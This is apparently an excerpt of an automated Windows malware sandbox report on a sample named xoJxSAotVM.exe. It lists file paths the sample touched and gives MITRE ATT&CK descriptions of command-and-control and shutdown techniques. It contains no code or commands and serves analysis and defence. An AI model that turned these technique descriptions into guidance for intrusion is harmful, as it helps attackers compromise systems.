C:\ProgramData\GDT0R9H4EU37\J5PP8Q

C:\ProgramData\GDT0R9H4EU37\JWBIEC

C:\ProgramData\GDT0R9H4EU37\L6XBA1

C:\ProgramData\GDT0R9H4EU37\VAS26F37Q

C:\ProgramData\GDT0R9H4EU37\ZCJ5X4

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Windows Analysis Report
xoJxSAotVM.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre